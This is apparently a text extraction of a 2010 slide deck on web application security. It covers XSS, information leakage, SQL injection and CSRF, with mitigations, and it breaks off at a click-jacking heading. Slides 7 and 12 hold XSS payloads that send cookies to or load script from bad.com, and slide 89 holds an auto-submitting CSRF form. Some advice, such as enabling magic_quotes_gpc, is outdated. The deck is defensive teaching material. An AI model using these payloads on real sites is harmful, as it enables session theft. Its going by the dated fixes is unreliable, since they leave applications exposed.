1. BEST PRACTICES OF 2010 WEB APPLICATION SECURITY by SamvelGevorgyan

2. STATISTICS OF VULNERABILITIES Source: ptresearch.blogspot.com/2010/06/web-application-vulnerability.html

3. STATISTICS OF RISK LEVELS Source: ptresearch.blogspot.com/2010/06/web-application-vulnerability.html

4. TOP 10 HIGH LEVEL VULNERABILITIES 01. Cross-Site Scripting (XSS) [Symantec - 2007] 02. Information leakage 03. SQL Injection [~2005] 04. Cross-Site Request Forgery (CSRF) [1990s] 05. ClickJacking [J.Grossman and R.Hansen - 2008] 06. Phishing[1987, 1996] 07. Path Traversal or Local/Remote File Inclusion 08. Shell injection 09. Session Hijacking [early 2000s] 10. File uploads

6. CROSS-SITE SCRIPTING TYPES: Non-Persistant Persistant 1.Non-Persistant: In this type of XSS vulnerability the attacker is able to execute his own code in a website but no changes can be done in that website.

7. CROSS-SITE SCRIPTING Non-Persistant EXAMPLE: http://www.site.com/viewtopic.php?id=4"><script>document.location="http://bad.com/logger.php?cookie="+document.cookie;</script> OR http://www.site.com/viewtopic.php?id=4”><script>document.write(“<img src=‘http://bad.com/logger.php?cookie=“+ document.cookie+”’/>”);</script>

9. Chat messages

10. E-mail messages

12. CROSS-SITE SCRIPTING Persistant Comment in raw format: and I like the way this website developers work..hahaha :D :D <SCRIPT/XSS SRC="http://bad.com/xss.js"> </SCRIPT>

14. <body>

15. <embed>

16. <frame>

17. <script>

18. <frameset>

19. <html>

20. <iframe>

21. <img>

22. <style>

23. <layer>

24. <ilayer>

25. <meta>

27. style

28. href

30. Onchange

31. Onclick

32. Ondrag

33. Onerror

34. Onfocus

35. Onkeypress

36. Onkeyup

37. Onload

38. Onmouseover

39. Onmousemove

40. Onmove

41. Onresize

42. Onselectstart

43. Onselect

44. Onsubmit

45. Onunload

46. Onscroll, etc.*all HTML events

48. PHP Input Filter

49. PHP libraries:

50. HTML_Safe

51. htmLawed

52. kses

54. BEST SOLUTION COMPARISON: Source: www.htmlpurifier.org/comparison

55. BEST SOLUTION COMPARISON: Source: www.htmlpurifier.org/comparison

57. INFORMATION LEAKAGE COUSES OF: Directory listening misconfiguration Unproper error handling Unproper filetype handling Sensitive HTML comments, etc. 1.Directory listening misconfiguration: Leaving directory listening enabled allows the attacker to read the list of all files in a directory.

61. sql_backup.tar.gz

62. memberlist.xml

63. phpinfo.html

64. dbClass.inc

67. BEST SOLUTION Directory listening misconfiguration put a blank file named index.html in that directory. put a file named .htaccess in that directory consisting of only this line:Options –indexes NOTE: all sub-directories of that directory will also get their directory listings turned off.

69. display_errors = Off

70. log_errors = On

73. Database files(*.sql, *.cvs, *.xml, *.xls, etc.)

76. SQL INJECTION TYPES: Normal Blind 1.Normal: In this type of SQL Injection vulnerability attacker sends a custom SQL query and gets the output in the screen.

80. magic_quotes_gpc = on

81. PHP functions

82. filter_var()

83. mysql_real_escape_string()

84. sprintf()

85. Put variables into the quotes(e.g: ‘$id’)

87. BEST SOLUTION GreenSQL open source database firewall:

89. CROSS-SITE REQUEST FORGERY EXAMPLE: <div style=“display:none”> <iframe name=“hidden”></iframe> <form name=“Form” action= “http://site.com/post.php” target=“hidden” method=“POST”> <input type=“text” name=“message” value=“I like www.bad.com” /> <input type=“submit” /> </form> <script>document.Form.submit();</script> </div>

93. href attribute

94. src attribute

95. hidden field in all forms

96. Actions:

97. Log

98. Invalidate

99. RedirectUser (Browser) 1. Add token with regex 2. Add token with HTML parser 3. Add token in browser with Javascript Source: www.owasp.org/index.php/CSRFGuard

101. CLICK-JACKING EXAMPLE: